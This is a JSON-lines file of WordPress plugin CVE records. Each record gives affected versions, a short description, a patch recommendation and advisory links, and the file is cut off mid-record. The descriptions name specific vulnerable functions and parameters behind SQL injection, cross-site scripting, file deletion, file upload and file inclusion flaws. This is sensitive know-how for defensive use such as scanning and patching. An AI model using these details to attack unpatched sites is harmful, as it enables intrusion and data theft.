{"CVE_ID":"CVE-2024-5489","slug":"custom-font-uploader","versionImpact":"2.3.4","versionEndExcluding":"2.4.0","description":"The Wbcom Designs \u2013 Custom Font Uploader plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'cfu_delete_customfont' function in all versions up to, and including, 2.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete any custom font.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2339ebbf-2302-4e83-9743-ca79fda20f05?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2339ebbf-2302-4e83-9743-ca79fda20f05?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-font-uploader\\\/trunk\\\/inc\\\/cfup-functions.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-font-uploader\\\/trunk\\\/inc\\\/cfup-functions.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097373\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097373\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2010","slug":"jobwp","versionImpact":"2.3.9","versionEndExcluding":"2.4.0","description":"The JobWP \u2013 Job Board, Job Listing, Career Page and Recruitment Plugin plugin for WordPress is vulnerable to SQL Injection via the 'jobwp_upload_resume' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271612\\\/jobwp\\\/tags\\\/2.4.0\\\/core\\\/job_application.php?old=3230672&old_path=jobwp%2Ftags%2F2.3.9%2Fcore%2Fjob_application.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271612\\\/jobwp\\\/tags\\\/2.4.0\\\/core\\\/job_application.php?old=3230672&old_path=jobwp%2Ftags%2F2.3.9%2Fcore%2Fjob_application.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3b658f0-b9d8-4b7f-8d40-39ce185ef797?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3b658f0-b9d8-4b7f-8d40-39ce185ef797?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13516","slug":"kubio","versionImpact":"2.3.5","versionEndExcluding":"2.4.0","description":"The Kubio AI Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message' parameter in all versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186251\\\/kubio\\\/trunk\\\/static\\\/kubio-iframe-loader.html\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186251\\\/kubio\\\/trunk\\\/static\\\/kubio-iframe-loader.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2246fac-0d95-4ff5-ad1e-aa1fefa03b4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2246fac-0d95-4ff5-ad1e-aa1fefa03b4d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6807","slug":"generatepress-premium","versionImpact":"2.3.2","versionEndExcluding":"2.4.0","description":"The GeneratePress Premium plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom meta output in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dcd48b8-ec9e-44b4-b531-95940adbd100?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dcd48b8-ec9e-44b4-b531-95940adbd100?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/generatepress.com\\\/category\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/generatepress.com\\\/category\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5691","slug":"collectchat","versionImpact":"2.3.9","versionEndExcluding":"2.4.0","description":"The Chatbot for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in version 2.3.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd67329-11b1-4f00-a422-bb4833a3181d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd67329-11b1-4f00-a422-bb4833a3181d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3000724%40collectchat%2Ftrunk&old=2983408%40collectchat%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3000724%40collectchat%2Ftrunk&old=2983408%40collectchat%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12321","slug":"wc-affiliate","versionImpact":"2.3","versionEndExcluding":"2.4","description":"The WC Affiliate  WordPress plugin through 2.3.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4c55d30-1c15-41ee-95e0-670891d67684\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4c55d30-1c15-41ee-95e0-670891d67684\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4c55d30-1c15-41ee-95e0-670891d67684\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4c55d30-1c15-41ee-95e0-670891d67684\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12066","slug":"smsa-shipping-official","versionImpact":"2.3","versionEndExcluding":"2.4","description":"The SMSA Shipping(official) plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the smsa_delete_label() function in all versions up to, and including, 2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smsa-shipping-official\\\/trunk\\\/smsa-express-shipping.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smsa-shipping-official\\\/trunk\\\/smsa-express-shipping.php#L235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29d72347-ba49-45c6-a964-2c75064ac866?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29d72347-ba49-45c6-a964-2c75064ac866?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-36399","slug":"booked","versionEndExcluding":"2.4","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BoxyStudio Booked - Appointment Booking for WordPress | Calendars.This issue affects Booked - Appointment Booking for WordPress | Calendars: from n\/a before 2.4.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/booked\\\/wordpress-booked-plugin-2-4-unauth-appointment-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/booked\\\/wordpress-booked-plugin-2-4-unauth-appointment-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9290","slug":"indeed-wp-superbackup","versionImpact":"2.3.3","versionEndExcluding":"2.4","description":"The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and a missing capability check on the ibk_restore_migrate_check() function in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/super-backup-clone-migrate-for-wordpress\\\/12943030\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/super-backup-clone-migrate-for-wordpress\\\/12943030\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5087","slug":"minimal-coming-soon-maintenance-mode","versionImpact":"2.38","versionEndExcluding":"2.39","description":"The Minimal Coming Soon \u2013 Coming Soon Page plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the validate_ajax, deactivate_ajax, and save_ajax functions in all versions up to, and including, 2.38. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit the license key, which could disable features of the plugin.","recommendation":"Update to version 2.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/affdaf63-2098-4ad6-b15b-990d1941fecb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/affdaf63-2098-4ad6-b15b-990d1941fecb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L561\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L561\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L585\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L585\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L596\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/tags\\\/2.38\\\/framework\\\/wf-licensing.php#L596\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/swisskyrepo\\\/PayloadsAllTheThings\\\/blob\\\/master\\\/CRLF%20Injection\\\/README.md\",\"name\":\"https:\\\/\\\/github.com\\\/swisskyrepo\\\/PayloadsAllTheThings\\\/blob\\\/master\\\/CRLF%20Injection\\\/README.md\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099123\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099123\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1075","slug":"minimal-coming-soon-maintenance-mode","versionImpact":"2.37","versionEndExcluding":"2.38","description":"The Minimal Coming Soon \u2013 Coming Soon Page plugin for WordPress is vulnerable to maintenance mode bypass and information disclosure in all versions up to, and including, 2.37. This is due to the plugin improperly validating the request path. This makes it possible for unauthenticated attackers to bypass maintenance mode and view pages that should be hidden.","recommendation":"Update to version 2.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78203b98-15bc-4d8e-9278-c472b518be07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78203b98-15bc-4d8e-9278-c472b518be07?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/trunk\\\/framework\\\/public\\\/init.php#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-coming-soon-maintenance-mode\\\/trunk\\\/framework\\\/public\\\/init.php#L67\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031149\\\/minimal-coming-soon-maintenance-mode\\\/trunk\\\/framework\\\/public\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031149\\\/minimal-coming-soon-maintenance-mode\\\/trunk\\\/framework\\\/public\\\/init.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12472","slug":"post-duplicator","versionImpact":"2.36","versionEndExcluding":"2.37","description":"The Post Duplicator plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.36 via the mtphr_duplicate_post() due to insufficient restrictions on which posts can be duplicated. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to by duplicating the post.","recommendation":"Update to version 2.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219375%40post-duplicator&new=3219375%40post-duplicator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219375%40post-duplicator&new=3219375%40post-duplicator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3071b2dc-9673-4e30-bd04-7404eb6a1ed9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3071b2dc-9673-4e30-bd04-7404eb6a1ed9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13910","slug":"database-backup","versionImpact":"2.36","versionEndExcluding":"2.37","description":"The Database Backup and check Tables Automated With Scheduler 2024 plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'database_backup_ajax_delete' function in all versions up to, and including, 2.35. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The vulnerability was partially patched in version 2.36.","recommendation":"Update to version 2.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/database-backup.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/database-backup.php#L267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247917\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247917\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248708\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248708\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c92776c4-643c-40f2-ac28-5df5d6bf7fcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c92776c4-643c-40f2-ac28-5df5d6bf7fcd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13911","slug":"database-backup","versionImpact":"2.35","versionEndExcluding":"2.36","description":"The Database Backup and check Tables Automated With Scheduler 2024 plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.35 via the \/dashboard\/backup.php file. This makes it possible for authenticated attackers, with Administrator-level access and above, to extract sensitive data including full database credentials.","recommendation":"Update to version 2.36, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-backup\\\/trunk\\\/dashboard\\\/backup.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247917\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247917\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c548b70a-8566-4aaf-a3a2-fce6c19e6a0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c548b70a-8566-4aaf-a3a2-fce6c19e6a0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1068","slug":"404-solution","versionImpact":"2.35.7","versionEndExcluding":"2.35.8","description":"The 404 Solution WordPress plugin before 2.35.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admins.","recommendation":"Update to version 2.35.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25e3c1a1-3c45-41df-ae50-0e20d86c5484\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25e3c1a1-3c45-41df-ae50-0e20d86c5484\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11277","slug":"404-solution","versionImpact":"2.35.19","versionEndExcluding":"2.35.20","description":"The 404 Solution plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URLs in all versions up to, and including, 2.35.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.35.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/259f9ea3-ac24-4bea-8d0d-c635a68d9c98?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/259f9ea3-ac24-4bea-8d0d-c635a68d9c98?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3191597%40404-solution&new=3191597%40404-solution&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3191597%40404-solution&new=3191597%40404-solution&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6997","slug":"trx_addons","versionImpact":"2.35.1.1","versionEndExcluding":"2.35.2.2","description":"The ThemeREX Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.35.1.1 due to insufficient input sanitization and output escaping. The plugin\u2019s SVG rendering routine calls the trx_addons_get_svg_from_file() function on an unvalidated 'svg' parameter supplied via the shortcode or Elementor widget settings, then outputs it via the trx_addons_show_layout() function.  Because there is no check on the URL\u2019s origin, scheme, or the SVG content itself, authenticated attackers, with Contributor-level access and above, can supply a remote SVG and inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 2.35.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themerex.net\\\/wp\\\/download_plugins\\\/themerex-addons\\\/\",\"name\":\"https:\\\/\\\/themerex.net\\\/wp\\\/download_plugins\\\/themerex-addons\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1b19017-b2f0-4c3b-b263-1fbec6f1dce4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1b19017-b2f0-4c3b-b263-1fbec6f1dce4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11094","slug":"404-solution","versionImpact":"2.35.17","versionEndExcluding":"2.35.18","description":"The 404 Solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.35.17 via the export feature. This makes it possible for unauthenticated attackers to extract sensitive data such as redirects including GET parameters which may reveal sensitive information.","recommendation":"Update to version 2.35.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d738be73-2573-4fb8-b6f0-768a08628265?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d738be73-2573-4fb8-b6f0-768a08628265?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3188844%40404-solution%2Ftrunk&old=3169186%40404-solution%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3188844%40404-solution%2Ftrunk&old=3169186%40404-solution%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6799","slug":"yith-essential-kit-for-woocommerce-1","versionImpact":"2.34.0","versionEndExcluding":"2.35.0","description":"The YITH Essential Kit for WooCommerce #1 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'activate_module', 'deactivate_module', and 'install_module' functions in all versions up to, and including, 2.34.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install, activate, and deactivate plugins from a pre-defined list of available YITH plugins.","recommendation":"Update to version 2.35.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca497ffa-6306-46dc-895f-94f1d5236e28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca497ffa-6306-46dc-895f-94f1d5236e28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L425\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L425\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L487\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yith-essential-kit-for-woocommerce-1\\\/trunk\\\/class-yith-jetpack.php#L487\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120283\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120283\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0682","slug":"trx_addons","versionImpact":"2.33.0","versionEndExcluding":"2.34.0","description":"The ThemeREX Addons plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.33.0 via the 'trx_sc_reviews' shortcode 'type' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 2.34.0, or a newer patched 